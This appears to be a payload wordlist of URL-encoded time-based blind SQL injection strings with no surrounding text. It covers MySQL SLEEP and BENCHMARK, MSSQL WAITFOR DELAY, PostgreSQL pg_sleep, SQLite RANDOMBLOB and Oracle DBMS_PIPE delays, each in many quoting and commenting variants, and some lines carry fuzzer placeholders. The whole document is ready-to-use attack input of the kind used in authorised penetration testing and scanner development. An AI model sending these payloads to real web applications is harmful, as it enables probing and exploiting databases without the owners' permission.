sleep(10)#
1+or+sleep(10)#
"+or+sleep(10)#
'+or+sleep(10)#
"+or+sleep(10)="
'+or+sleep(10)='
1)+or+sleep(10)#
")+or+sleep(10)="
')+or+sleep(10)='
1))+or+sleep(10)#
"))+or+sleep(10)="
'))+or+sleep(10)='
;waitfor+delay+'0:0:5'--
);waitfor+delay+'0:0:5'--
';waitfor+delay+'0:0:5'--
";waitfor+delay+'0:0:5'--
');waitfor+delay+'0:0:5'--
");waitfor+delay+'0:0:5'--
));waitfor+delay+'0:0:5'--
'));waitfor+delay+'0:0:5'--
"));waitfor+delay+'0:0:5'--
benchmark(10000000,MD5(1))#
1+or+benchmark(10000000,MD5(1))#
"+or+benchmark(10000000,MD5(1))#
'+or+benchmark(10000000,MD5(1))#
1)+or+benchmark(10000000,MD5(1))#
")+or+benchmark(10000000,MD5(1))#
')+or+benchmark(10000000,MD5(1))#
1))+or+benchmark(10000000,MD5(1))#
"))+or+benchmark(10000000,MD5(1))#
'))+or+benchmark(10000000,MD5(1))#
pg_sleep(10)--
1+or+pg_sleep(10)--
"+or+pg_sleep(10)--
'+or+pg_sleep(10)--
1)+or+pg_sleep(10)--
")+or+pg_sleep(10)--
')+or+pg_sleep(10)--
1))+or+pg_sleep(10)--
"))+or+pg_sleep(10)--
'))+or+pg_sleep(10)--
AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))bAKL)+AND+'vRxe'='vRxe
AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))YjoC)+AND+'%'='
AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))nQIP)
AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))nQIP)--
AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))nQIP)#
SLEEP(10)#
SLEEP(10)--
SLEEP(10)="
SLEEP(10)='
or+SLEEP(10)
or+SLEEP(10)#
or+SLEEP(10)--
or+SLEEP(10)="
or+SLEEP(10)='
waitfor+delay+'00:00:05'
waitfor+delay+'00:00:05'--
waitfor+delay+'00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or+benchmark(50000000,MD5(1))
or+benchmark(50000000,MD5(1))--
or+benchmark(50000000,MD5(1))#
pg_SLEEP(10)
pg_SLEEP(10)--
pg_SLEEP(10)#
or+pg_SLEEP(10)
or+pg_SLEEP(10)--
or+pg_SLEEP(10)#
'\"
AnD+SLEEP(10)
AnD+SLEEP(10)--
AnD+SLEEP(10)#
&&SLEEP(10)
&&SLEEP(10)--
&&SLEEP(10)#
'+AnD+SLEEP(10)+ANd+'1
'&&SLEEP(10)&&'1
ORDER+BY+SLEEP(10)
ORDER+BY+SLEEP(10)--
ORDER+BY+SLEEP(10)#
(SELECT+*+FROM+(SELECT(SLEEP(10)))ecMj)
(SELECT+*+FROM+(SELECT(SLEEP(10)))ecMj)#
(SELECT+*+FROM+(SELECT(SLEEP(10)))ecMj)--
+benchmark(3200,SHA1(1))+'
++SLEEP(10)+++'
RANDOMBLOB(500000000/2)
AND+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*'+or+SLEEP(1)+or+'"+or+SLEEP(1)+or+"*/
'+++sleep(10)
'+and+sleep(10)
'+&&+sleep(10)
'+|+sleep(10)
'+||+pg_sleep(10)
'+WAITFOR+DELAY+'0:0:10'
'+AND+[RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
'+AND+123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)
1'+AND+[RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
1'+AND+123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))bAKL)+AND+'vRxe'='vRxe
'+AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))YjoC)+AND+'%'='
'+AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))nQIP)
'+AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))nQIP)--
'+AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))nQIP)#
'+SLEEP(10)#
'+SLEEP(10)--
'+SLEEP(10)="
'+SLEEP(10)='
'+or+SLEEP(10)
'+or+SLEEP(10)#
'+or+SLEEP(10)--
'+or+SLEEP(10)="
'+or+SLEEP(10)='
'+waitfor+delay+'00:00:05'
'+waitfor+delay+'00:00:05'--
'+waitfor+delay+'00:00:05'#
'+benchmark(50000000,MD5(1))
'+benchmark(50000000,MD5(1))--
'+benchmark(50000000,MD5(1))#
'+or+benchmark(50000000,MD5(1))
'+or+benchmark(50000000,MD5(1))--
'+or+benchmark(50000000,MD5(1))#
'+pg_SLEEP(10)
'+pg_SLEEP(10)--
'+pg_SLEEP(10)#
'+or+pg_SLEEP(10)
'+or+pg_SLEEP(10)--
'+or+pg_SLEEP(10)#
'\"
'+AnD+SLEEP(10)
'+AnD+SLEEP(10)--
'+AnD+SLEEP(10)#
&&SLEEP(10)
'+&&SLEEP(10)--
'+&&SLEEP(10)#
'+AnD+SLEEP(10)+ANd+'1
'&&SLEEP(10)&&'1
'+ORDER+BY+SLEEP(10)
'+ORDER+BY+SLEEP(10)--
'+ORDER+BY+SLEEP(10)#
'+(SELECT+*+FROM+(SELECT(SLEEP(10)))ecMj)
'+(SELECT+*+FROM+(SELECT(SLEEP(10)))ecMj)#
'+(SELECT+*+FROM+(SELECT(SLEEP(10)))ecMj)--
'++benchmark(3200,SHA1(1))+'
'+++SLEEP(10)+++'
'+RANDOMBLOB(500000000/2)
'+AND+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
'+OR+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
'+RANDOMBLOB(1000000000/2)
'+AND+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
'+OR+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
'+SLEEP(1)/*'+or+SLEEP(1)+or+'"+or+SLEEP(1)+or+"*/
